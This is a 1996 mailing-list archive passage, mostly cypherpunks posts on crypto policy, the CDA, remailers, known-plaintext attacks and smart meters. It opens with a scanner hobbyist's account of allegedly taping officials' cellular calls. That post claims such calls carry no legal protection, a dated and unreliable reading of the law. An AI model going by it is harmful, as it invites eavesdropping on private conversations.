X-Sender:kilo@tiac.net
X-Mailing-List:<scan-mass-east@nomad.n-reading.ma.us


CORDLESS PHONE MONITORING: --  I was accused of monitoring phone
conversations of public officals  over a scanner.  I was accused of taping
said conversations in which the public officals were conducting town
buissness in a illegal manner etc. The allegded tapes (copies) were
allegedly passed around to "other" town officals for them to hear what was
being  "said", "done", and what actions were about to unfold. A
investigation by the Mass. District Attoney was ordered and the results if
that investigation is as follows ---- "The information available during this
investigation indicated that the telephone calls which were tape recorded
were made on a cellular telephone or a portable telephone. No evidence was
obtained indicating a wire communication was illegally intercepted and
recorded. The audio tape that was around the town of $%#@!%^%$$ and played
for several individuals was not recovered. @@  @#$$#%  ^%%&*  found the tape
left on the front seat of %$^  car  and had it for a period of time, but
does not have it or knew where it was at this time. This officer (police)
explained to those directly involved that cellular telephone conversations
and any conversation that is transmitted over the airwaves is not protected
communitations, as there is no expectation of privacy in the open airways. I
further informed those involved that there are people who have nothing
better to do then listen and record such cellular telephone calls and this
means of communication is not secure. This officer requests that this
investigation be closed".     That is from the Masssachusetts District
Attoney's Office in  Barnstable,Mass. ******** In fact when I was
interviewed I was told flat out that lawenforcement "does not want" it to be
against the law, because not only do they hear about drug transactions which
allows them to bust subjects, "BUT" it  is also a saftey tool, for at times
the people under survailance talk using this type of communication and they
(POLICE) can find out if the subject(s)  have weapons, etc. etc......!!!!!
That's what my experience in this area is... Happy Scanning!!!!!!!!!! 


Vietnam Vets - "USMC"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Apr 1996 18:14:07 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: "Contempt" charges likely to increase
Message-ID: <m0u7wxs-00090cC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 PM 4/12/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"jimbell@pacifier.com"  "jim bell"  7-APR-1996 03:10:38.36

>>I think that most crimes that subpoenas  would normally be used for are 
>>probably not crimes at all, and are probably "malum prohibitum," not "malum 
>>in se" crimes. And in the future, they would likely be used to harass 
>>political enemies, as harassment was done in the 1950's and 60's.   This 
>>means, for anybody of a libertarian bent, that it would actually be better 
>>if the government could be rendered incapable of enforcing them.  Naturally, 
>>governments and courts will resist, but that will be irrelevant.
>
>	I would guess that most instances of violations of banking secrecy,
>wiretaps, et al fall into this category also.


True, I think.  For example, 10-20 years from now there will probably be no 
need anymore for laws against wiretaps, because crypto telephones will 
become so cheap and ubiquitous that it will be assumed that anybody saying 
anything "valuable" on the phone will be using good crypto.  If that's the 
case, nobody will even bother doing wiretaps, and nobody will ever lose 
anything as a consequence of being tapped.  There's no point in having a law 
against a crime that never occurs.

Likewise, "banking secrecy" will become a contractural obligation:  Nobody 
who isn't privy to this information will be able to retrieve it.  

Looked at in this light, laws against victimless crimes can be seen as a 
last, desperate attempt by government to replace the real crimes which are 
"lost" to technological developments with placeholders; things the cops can 
do when nobody needs them.

I think it would be reasonable to present so-called "law enforcement" with 
an ultimatum:  "Make yourself obsolete within 10 years or we do it for you." 
 In other words, choose only those crimes which have real victims, and 
figure out technological ways to either prevent them entirely, or solve then 
once committed.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 13 Apr 1996 18:10:22 +0800
To: "E. ALLEN SMITH" <weidai@eskimo.com
Subject: Re: the cost of untracability?
Message-ID: <199604130501.WAA02229@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:42 PM 4/12/96 -0400, E. ALLEN SMITH wrote:
>From:   IN%"weidai@eskimo.com"  "Wei Dai"  7-APR-1996 10:52:52.30
>
>>I think you're right.  There is no need for the issuer to pay explicit
>>interest.  The easiest way to eliminate signorage would be to steadily
>>increase the value of each denomination of ecash. ...
>
>        Another method would be for ecash to have a label on it as to when the
>issuer would redeem it. Until then, if you want cash from it, find someone else
>to trade to. ...

And if you are using a "first to clear gets the money" system like
Digicash, the holders can race to see who gets the money.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 15:46:09 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Why there are so many cluless people
Message-ID: <ad94813302021004cd6f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 PM 4/12/96, Andrew Loewenstern wrote:

>I heard that Internet Privacy Guaranteed is coming out with their own set of
>cassette tapes...  ;-)
>
>"Become a cryptanalyst in 21 days, while you sleep, or your money back!"

This is old news. "Subliminal channels" have been around  in crypto for a
long time.


--Klaus! von Future Prime







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rodger@interramp.com (Will Rodger)
Date: Sat, 13 Apr 1996 14:06:29 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenge: Update #6
Message-ID: <v01510102ad948d03235c@[38.12.5.135]>
MIME-Version: 1.0
Content-Type: text/plain


On 4/11/96 Declan McCullagh wrote:

>+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
>                WHO CARES ABOUT KIDS: WHO ARE THE ADULTS?
>+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
>
>The third way to answer the now-tiresome who-are-the-kiddies question
>is to turn it on its head and ask: "Who are the adults?"
>
>Hardware to answer that question already exists. The March 25 issue of
>Interactive Week reports that Livingston Enterprises, Inc. has
>colluded with Senator Exon's staff to design an "Exon box" -- a router
>that lets ISPs cut off unrated or "indecent" or unrated sites. To get
>around the block, an "adult" enters a secret password that tells the
>router to open a session and let the packets flow.
>
Whoa. Thanks for mentioning my article, Declan, but I think "colluded" is
too strong here - as far as I know, Livingston never contacted Exon, even
though Livingston's ChoiceNet can undoubtedly play into his hands.

>Exon's staff is heralding this as an example of how easy it is to comply
>with the CDA.

Almost - Bruce Taylor is, actually, but he's not part of Exon's satff.


The only problem is that, like many such
>hamfisted censorship "solutions," it sucks, and it ain't going to
>work. One of the original architects of the Internet, David P. Reed,
>wrote:
>
>  I do work to protect my children from inappropriate material, but
>  pressure from Senators to mandate technically flawed solutions, and
>  opportunistic, poorly thought-through technologies from companies
>  like Livingston are not helpful.
>

It should be noted that Livingston is promoting this as a voluntary
solution a la PICS. PICS' own Web pages, after all, suggest software on
routers could do the job as well as client products like NetNanny,
CyberPatrol, etc. There are some distinct advantages to doing it that way,
in fact.

Livingston insists this is an alternative to mandatory censorship, but
they're not being shy about admitting it can be used in other ways, too.
All that said, you cypherpunks can speculate who's up to what in all this.

Will Rodger
Washington Bureau Chief
Interactive Week







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 13 Apr 1996 19:11:49 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISE] Why there are so many cluless people
In-Reply-To: <v02120d39ad9446cc8b78@[192.0.2.1]>
Message-ID: <Pine.SOL.3.91.960412224955.26690F-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


There's a report on this in thise weeks bay area guardian; it's really 
just a schme to get people to pay to recruit other people to use someone 
elses webpage hosting service.


On Fri, 12 Apr 1996, Lucky Green wrote:

> Today, I heard a commercial on the radio. Some company wants to help you
> make $1k+ per day as an Internet expert. Simply listen to their one week
> audio tape course and you know everything you need to work as an Internet
> consultant.
> 
> Sigh,
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 13 Apr 1996 17:43:41 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: A MODEST PROPOSAL (fwd)
Message-ID: <199604130639.XAA29560@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>This happens any time anybody signs up with an an######@anon.penet.fi address.
>>Ideally, someone could, in their copious spare time, hack majordomo
>>to automatically translate all subscription requests of that form to
>>na######@anon.penet.fi ; as an alternative, if majordomo has some sort
>>of subscription blocking list an*@anon.penet.fi belongs on it.
>
>	In other words, majordomo is broken. I should have suspected as much,

No, it's not broken, it just interacts badly with anon.penet.fi.
Of the two of them, majordomo is doing the obvious unsurprising thing,
while anon.penet.fi needs a bit more complicated support because of
difficulties with its implication and the workarounds it uses.
Somebody did comment that they modified majordomo to handle this,
but presumably vanilla majordomo can at least pattern-match block an######,
and if it can't, you can always pre-process with egrep or sed.

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 13 Apr 1996 20:37:48 +0800
To: cypherpunks@toad.com
Subject: SF BAY event: Goodlatte, Burns, Pressler, Diffie, Hellman, Merkle, ...
Message-ID: <199604130647.XAA29808@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The event costs $35 (or $20 if you're a Churchill Club member).  Probably
plus the price of dinner -- this wasn't clear from their recording.
I wish I would be in town for it.  Someone do a trip report, please!  -- gnu

Date: Thu, 11 Apr 1996 19:43:08 -0700
From: Kate Apgar <kapgar@ix.netcom.com>
To: webmaster@eff.org
Subject: Goodlatte to appear in Burlingame

My name is Kate Apgar and I am the executive director of the a 
non-profit, nonpartisan organization called the Churchill Club.  We 
present about 20 programs a year with topics ranging from arts, 
entertainment, education, foreign affairs, economics, medicine and high 
technology. We are hosting a program on cryptography.  One of the 
keynote speakers is Congressman Goodlatte (see description of program 
below). If this information is appropriate, please post and let us know. 
Thank you for your time.

Information Security and the 20th Anniversary 
of Public Key Cryptography

Monday, April 29, 1996
Marriott Hotel, Burlingame, CA
5:30 PM Full Dinner
6:30 PM Program

KEYNOTE SPEAKERS:

Senator Conrad Burns (R, MT)
Senator Larry Pressler (R, SD)
Congressman Robert Goodlatte (R, VA)
David Morris, Vice President, Cylink Corp.
Jim Omura, Chief Technology Officer, Cylink Corp.
James Freeman, Special Agent in Charge, FBI
Phil Mellinger, Chief Engineer, Government Securities Assoc.
Paul Raines, Project Manager, United State Postal Service
Whitfield Diffie, Martin Hellman and Ralph Merkle - Pioneers and 
original patent holders for public key cryptography

Economic espionage is costing the nation billions of dollars in lost 
business every year.  U.S. companies are in danger of losing everything 
from trade secrets and proprietary financial information , to the bottom 
line figures on contract bills.  Three bills are now in Congress to 
protect government, business and home computer users from outside 
snooping of sensitive information.  These proposed new laws have been 
written to encourage the use of encryption and loosen export 
restrictions on encryption technology.  Congressman Goodlatte is the 
author of one of these bills.  April 1996 is also the 20th anniversary 
of the creation of Public Key Cryptography.  The three principal 
pioneers and patent holders will also be present to share their views on 
the need for strong encryption.  Morris of Cylink Corp. will provide an 
overview of what state-of-the-art security solutions are needed, and 
available, to truly protect business from unauthorized access.  James 
Freeman of the FBI will discuss the recent study on industrial espionage 
and Paul Raines from the U.S. Postal Service will talk about electronic 
postmarking and certificate authority key registry bureau.

TO REGISTER:

Please call (408) 371-4460
or fax reservations (408) 371-4180
or email chrchllclb@aol.com

PRESENTED BY THE CHURCHILL CLUB




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 13 Apr 1996 17:43:44 +0800
To: Jack Mott <thecrow@iconn.net>
Subject: Re: Known Plaintext attacks on symmertric algorithms
Message-ID: <199604130654.XAA29908@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:09 PM 4/12/96 -0400, you wrote:
>Now maybe I have this all wrong, but it is my understanding that a known 
>plaintext attack is when the cracker knows part of the plaintext of an 
>encrypted file.  Then he/she uses that and runs the inverse of the 
>algorithm to calculate the key.

Some algorithms have usable inverses, but good ones try not to;
one class of known plaintext attack is working your way back through
the algorithm to discover the key bits using the known parts.
Another kind of attack is just to brute-force the key, assuming the
algorithm or key length is short enough to do that quickly.

>  Whether or not I am right about what known plaintext means, isn't the 
>entirely possible on all of the symmetric algorithms out there? If I 
>grab a file that I know is, say, a standard credit card transaction 
>form, and I know what the first 256 bytes are because they are always 
>the same, shouldn I always be able to find the entire key that 
>corresponds with those 256 bytes? (assuming the key is 2048 bits or 
>less) And then with that key decrypt the whole file?

Algorithms vary widely on their susceptibility.  Consider a one-time-pad:
even if you know the first 256 bytes of the transaction, all that does
is let you recover the first 256 bytes of key, which will never be used again,
even in the second half of the message.   Pretty useless, usually.
On the other hand, consider a simple "xor with the key, repeating as often
as needed";
if the key's no longer than your known plaintext, xor again, find the key,
repeat as often as needed, and you've got the whole message.

Using the same technique with DES will be left as an exercise for the reader :-)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Apr 1996 20:12:00 +0800
To: "Richard K. Moore" <rkmoore@iol.ie>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <v02110134ad945a3a8bff@[194.125.43.36]>
Message-ID: <Pine.ULT.3.92.960412234329.2525A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Apr 1996, Richard K. Moore wrote:

> 4/11/96, Bill Stewart wrote:
> >There are serious technical problems with the suggestion that labelling
> >packets as "Adult" or "Child" using IP options and filtering at ISPs
> >for censorship.
>
>         IMHO, the technical problems can somehow be solved, whether we like
> it or not, although it will probably be botched intentionally or otherwise.
> It's tougher than most protocol upgrades, but easier than was designing
> X.400 (just to give some GROSS bounds to the problem).

Hello? We're talking packets, not sessions. Trying to do this at the
network layer (or lower) is so monstrously wrong that it's not worth
talking about. It's impossible by design. In a properly designed system,
the application should have no way to tell the protocol stack to flip
special bits. What about encapsulation? Fragmentation? LAN emulation?

Although... if you're talking ATM PVCs rather than packets, I could
imagine adding minor/adult negotiation to the setup phase. But despite the
hype, I don't expect to see many people using raw ATM (not LAN
emulation/encapsulation) for a decade, if at all.

>         My (simplistically presented) suggestion in such a scheme would be
> that we don't want a "flag" on packets: we want two "fields":
>         - content-classification field in packets:
>                 _roughly_ analogous to a dewey-decimal number -- says a
>                 lot (?) about the content, not merely which end of the
>                 library it goes in
>
>         - user-classification field appended to user-id's:
>                 a micro-bio of the user -- says something
>                 about age, languages known, interests

We're talking packets here, not sessions.

>         Before you flame -- I'm not thinking about the potential abuses,
> I'm thinking about the useful applications: more useful filtering based on
> such fields can be installed as agents on:
>         - user machine
>         - "dial-in" network node
>         - retrieval engines
>         - database engines

For this you use different TCP ports and out-of-band cryptographic
authentication, not extra fields in the packets.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Sat, 13 Apr 1996 20:21:51 +0800
To: cypherpunks@toad.com
Subject: Re: Entropy Estimator
Message-ID: <199604130725.AAA00737@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Apr 1996 at 20:58:19 Timothy C. May wrote:

>At 9:06 PM 4/12/96, rick hoselton wrote:

>>... I have these two 8-million byte
>>files.  One is a recording made by a geiger counter, every bit
>>is uncorrelated with anything else in the universe ...

>No, this is not the case. Suppose your file of 64 million bits of entropy
>is stored as "Rick's Geiger Counter File,"...

I left the word "you" out of one sentence.  My line breaks are very 
strange.  I wrote "chronologist" when I meant "horologist".  I revealed 
a US-centric point of view, and I broke a New Year's resolution by 
contributing to the noise level on the cypherpunks mailing list.  

But I did not forget to say:

>...every bit is uncorrelated with anything else in the universe ...

:)

Rick Hoselton

It's not really fair to call me crazy, just because 
one of my personalities is paranoid/schizophrenic.
Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 13 Apr 1996 05:13:13 +0800
To: lacc@suburbia.net
Subject: Re: LACC: CDA Court Challenge: Update #6
In-Reply-To: <9604121057.AA26895@all.net>
Message-ID: <199604121503.BAA27341@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> This would ONLY impact packets that carry pornographic material, and all
> other packets would remain unchanged.  Naturally, you would not be able
> to have Classified Pornographic material under this scheme, but I think
> that's probably an acceptable tradeoff.

Oh, I don't know. The remote satalite imaging lab in reston has been known
for sometime now to have enough resolution to look down a good clean
cleavege, and certainly their perspective is vertical enough.

> Furthermore, any parent that wanted to allow a child to attach to the
> Internet and wanted pornographic protection would be responsible for
> setting their own filter up to limit these packets.  Thus the provider
> of pornographic material and the parent of the child using the net are
> the only two groups affected by this change.  The rest of the net can
> continue unhindered.  ISPs don't have to identify users.  After all, it
> is the parent and the bookstore owner who are responsible for keeping
> children out of the dirty book section, not the bus driver who brings
> the child to the neighborhood or the company that paves the street.

I've thought about this as well. You could also use the IP TOS minimise-cost
bit, which is defunct, doesn't require IP options, is included in every
packet and in most modern unix's and rfc1122 complient TCP/IP protocol
interface stacks can be set at user level with a simple setsockopt() call.
That said, it has a granularity of one.

To my mind, it is value judgement, and a difficult one at that to decide
when information is appropriate or otherwise for a given age group. A
given community may feel the age of maturity is something other than 18, and
physiologically the age of maturity is different for differing racial groups.
It is a strange world where it is permissible to get married at 16 -- and
all that implies, but not permissible to think freely until 18, or 21 in
certain states.

More appropriate would be content flags. Using the security option there is
a resonable number that could be assigned. OPT_R_UPPER_NUDITY,
OPT_R_LOWER_NUDITY, OPT_R_FULL_NUDITY, OPT_R_FEMALE, OPT_R_MALE, OPT_R_BIZARRE,
OPT_R_HOMOSEXUAL, OPT_R_BESTIALITY, OPT_R_DISECTION, OPT_R_INTERCOURSE, OPT_R_VIOLENCE and OPT_R_ADVERTISING come to mind. Unlike TOS however, many IP stacks
have no real support for the security option. The value of re-using it then
for this purpose it dubious. There is no reason another IP option couldn't
be added. Perhaps the spare TOS bit could be used as a catch-all until
a content option is implimented.

Most french wouldn't be concerned about OPT_R_FULL_NUDITY provided
OPT_R_HOMOSEXUAL wasn't set.

-- 
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Bulero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 14 Apr 1996 08:49:04 +0800
To: Vernor Vinge <vinge@saturn.sdsu.edu>
Subject: Tips on Tapping Taps
Message-ID: <v03006300ad94fddd6097@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Vernor,

What's your thinking on some privacy protection measures for these types of
"embedded systems?" Shouldn't these kinds of "instruments" (one
ringy-dingy) have some user-defeats or -definable permissions settings
built in from Day One?

Do we risk e$ accounts being billed automatically by water/gas/electric
meters on a daily basis without the possibility of users disputing the
readings in a timely way? Is anyone proposing permissions on such boxes?
What're the proposals, if any, for how the automated calls they make get
billed, get scheduled and show up on customer phone bills? I wonder if the
bills decrease, since this all saves the companies lots of money?

I'm all for "smart houses" but I'd prefer they learn the tricks _I_ teach 'em.

   dave


................................. cut here .................................

>Date: 10 Apr 96 19:03:05 EDT
>From: Dan Druck <73543.2304@CompuServe.COM>
>Subject: H2O Phone Taps
>
>WATER METER PHONE TAPS
>
>Recently, I received notice from our local water department (Algonquin,
>Illinois) that new water meters are to be installed in every residence.
>The twist is that the new meter taps into our telephone line and
>periodically and automatically reports the meter reading to the water
>department.
>
>Perhaps this is innocent enough but, being ever vigilant about my privacy,
>I've contacted the water department to get more info which they've
>promised to send. Interestingly, they told me I didn't have to accept this
>phone-tap meter, however they asked to install a different meter with a
>similar type of reporting device which is triggered via a device that also
>receives the meter reading (from just outside my house). I can only assume
>this transmission is made via a radio transmitter on the meter (which
>isn't really much of a consolation for me). This seems a bit oxymoronical
>since there already exists an external meter gauge on the exterior of my
>house. What is the advantage to standing outside my home with a
>transmitter/receiver over visually reading the external meter gauge???
>
>Obviously, how can one tell what the little micro-chip within the gizmo is
>*really* programmed to do? As you might imagine, I'm not at all
>comfortable with this thing wired into my phone line. I know..... if Big
>Brother wants to, he can listen in to my phone conversations or even into
>my house without such hard-wire tap. But I don't feel compelled to
>willingly submit to a potential invasion of my privacy, none-the-less!
>
>I can only assume resisting the installation of this Orwellian device will
>result in putting my name on every Barney Fife "what's he got to hide"
>list - who knows.
>
>I urge everyone who reads this to be vigilant about such things. If you
>receive such a notice from a public utility, you might be well advised to
>question them as I am doing. Sadly, most of my neighbors are probably
>submitting to this without a thought as I've not seen any letters of
>protest to the editor of the local newspaper ....a sign of the times, I
>guess.
>
>Dan Druck, Council on Domestic Relations
>Congressional Candidate / 8th District, Illinois
>
>Permission to repost/reprint (in whole or in part)
>is granted so long as such is accurate and proper
>credit is given.                          96MML12
>
>Council on Domestic Relations web page:
>        http://www.logoplex.com/shops/cdr/cdr.html
>        (last update 1/5/96)
>Druck for Congress web page:
>        http://ourworld.compuserve.com/homepages/ddruck
>        (last update 2/1/96)
>"CDR Info Hour" Radio Program / every Saturday @ 6:00p.m. CST
>        Shortwave 9.400 MHz
>        Satellite - Galaxy 6, Trnspndr 23, 6.1 Wide Band






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Sat, 13 Apr 1996 15:53:44 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: Scientologists may subpoena anonymous remailer records
Message-ID: <v02130521ad94d892f68e@[192.168.69.70]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:12 PM 4/10/96, Steve Reid wrote:
>The problem with that, of course, is that the remailer has to keep a
>record of who owns each anonymous account, so that it can direct the
>replies to the anonymous person. These records could be siezed.

Sameer will certainly correct me if I'm wrong, but remailers like c2 store
an encrypted header that is a path through the remailer system.

Since each nesting level is encrypted to that level's remailer, the other
levels only know which remailer to pass the message along to.  If you
really want to be secure, run your own remailer so that nasty folk can't
tell which of the encrypted messages are for you, and which your machine is
passing along.  I'd have a seperate account that I used solely for pointing
these c2 style messages to that had a procmail setup that would add a copy
of each message to my real mailbox and generate a random garbage file that
was a random number of bytes smaller than the incoming mail and premail it
through the remailer chain until it hit a /dev/null address.  That way, for
every message that entered your remailer one would exit for the benefit of
any traffic analysts.  I'd also make sure that the c2 address passed
through my remailer at least twice.

>BTW, has anyone out there created an anonymous web forwarder? I'm sure
>there are a lot of people out there who don't like the idea of having
>their email address in the log files of dozens of web servers... Creating
>a simple web forwarder wouldn't be hard.

I can't stand netscape's mailer and newsreader so I use Eudora Light and
just have netscape set to a bogus email address.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sat, 13 Apr 1996 17:13:12 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Answer about bits and bytes
In-Reply-To: <kTuamD31w165w@bwalk.dm.com>
Message-ID: <Pine.OSF.3.91.960413012249.6873A-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Just a note, Jim's attribution dates seem to be older than yours. Not 
that it matters a whole hill of beans.

Dan

P.S. DEC referred to memory size on the 11 series prior to the 11/70  in 
16 bit words, not 8 bit bytes. 

On Fri, 12 Apr 1996, Dr. Dimitri Vulis wrote:

> Jim Gillogly <jim@ACM.ORG> writes:
> > jim bell <jimbell@pacifier.com> writes:
> > >See, I do not challenge the fact that there were plenty of data objects of
> > >length other than 8-bits.  The issue is whether or not the people back then
> > >actually believed that a correct, official usage of the term "byte" included
> > >lengths other than 8.
> >
> > Reading from the PDP-10 Reference Handbook (DEC, 1971) page 2-30, we read:
> >
> > 	To conserve memory, it is useful to store data in less than full
> > 	36-bit words.  Bytes of any length, from 1 to 36 bits, may be
> > 	entered using a BYTE statement.
> >
> > 		BYTE (N) X,X,X
> ...
> 
> _The Programmer's Guide to the 1802_ (Tom Swan, Hayden Books, 1981) says the
> following on p. 19:
> 
>     The eight binary digits or bits represented in Fig. 2-1 are commonly
>     given the name _byte, and in this book, one byte will always equal
>     eight bits. (This is a rather common convention in microcomputing, but
>     a byte does not always equal eight bits in much of the published
>     literature.) Some books also refer to computer "words," but, since a
>     "word" is even more loosely defined than a "byte," we will refrain from
>     using it as a label for binary numbers. In addition, to make things
>     come out right for eight-bit computers, leading zeros are usually
>     written in front of binary numbers so all numbers come out to even
>     multiples of eight-bit bytes.
> 
> _Assembler Reference Manual for the Sub Workstation, Version 1.0 of
> 30th November 1982_ (we're talking the Motorola 68K Sun 1 here!) says:
> 
>     Many MC68000 machine instructions can operate upon byte (8-bit), word
>     (16-bit), or long word (32-bit) data.
> 
> They felt it necessary to specify this in a number of places.
> 
> A very important book that anyone who programs computers should read --
> Donald Knuth, _The Art of Computer Programming_ (Addison Wesley, 1973), v. 1,
> p. 120, says the following about the MIX language:
> 
>     Words. The basic unit of information is a _byte. Each byte contains an
>     _unspecified amount of information, but it must be capable of holding
>     at least 64 distinct values. That is, we know that any number between 0
>     and 63, inclusive, can be contained in one byte. Furthermore, each byte
>     contains _at _most 100 distinct values. On a binary computer a byte
>     must therefore be composed of six bits; on a decimal computer we have
>     two digits per byte.
> 
>     Programs written in the MIX language should be written so that no more
>     than sixty-four values are ever assumed for a byte. If we wish to treat
>     the number 80, we should always leave two adjacent bytes for expressing
>     it, even though one byte is sufficient on a decimal computer. _An
>     _algorithm _in _MIX _should _work _properly _regardless _of _how _big
>     _a _byte _is. Although it's quite possible to write programs which
>     depend on the byte size, this is an illegal act which will not be
>     tolerated; the only legitimate programs are those which would give
>     correct results with all byte sizes. It is usually not hard to abide by
>     these ground rule, and we will thereby find that programming a decimal
>     computer isn't so different from programming a binary one after all.
> 
>     ...
> 
>     _A _computer _word _is _five _bytes _plus _a _sign. The sign position
>     has only two possible values, + and -.
> 
> Give it up, Jim -- I have more ancient writings than you can shake a dynamite
> stick at. :-)
> 
> ---
> 
> Dr. Dimitri Vulis
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sat, 13 Apr 1996 17:54:05 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Calvin and Hobbes
In-Reply-To: <ad93d9911a0210046aff@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.960413015732.6873C-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Calvin is also ADHA.

Dan

On Fri, 12 Apr 1996, Timothy C. May wrote:

> At 3:14 AM 4/12/96, Adam Shostack wrote:
> 
> >        Snow Crash is a book about a future in which governments are
> >ineffective.  Companies run things, and have complete local control.
> >The world has gone to hell, and as a result, life is nasty, poor,
> >brutish and short.  Many people do not look forward to this world.
> 
> 
> Reminds me of a good joke I heard about the comic strip "Calvin and Hobbes"
> (Calvin is a little boy, Hobbes is his stuffed toy tiger, who only Calvin
> can see is alive).
> 
> Why is Calvin so much like Hobbes? He's nasty, brutish, and short.
> 
> 
> 
> (I heard this from Chip Morningstar...I don't know where he heard it, or if
> perchance he invented it.)
> 
> --Tim
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 13 Apr 1996 23:25:37 +0800
To: cypherpunks@toad.com
Subject: InfoWarCon: Call for Papers (Sept in Wash DC)
Message-ID: <199604130904.CAA03604@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's our chance to talk with, learn from, and educate the folks who
are pushing the concept of information warfare and seeing where it
goes.  The conference itself costs $1000 to attend, but I bet it's
free to speakers.  So dig out some related concept you've been wanting
to pin down on paper, write it up, and send it in.  It'd be pretty
silly to run or defend against an InfoWar without the cypherpunks, so
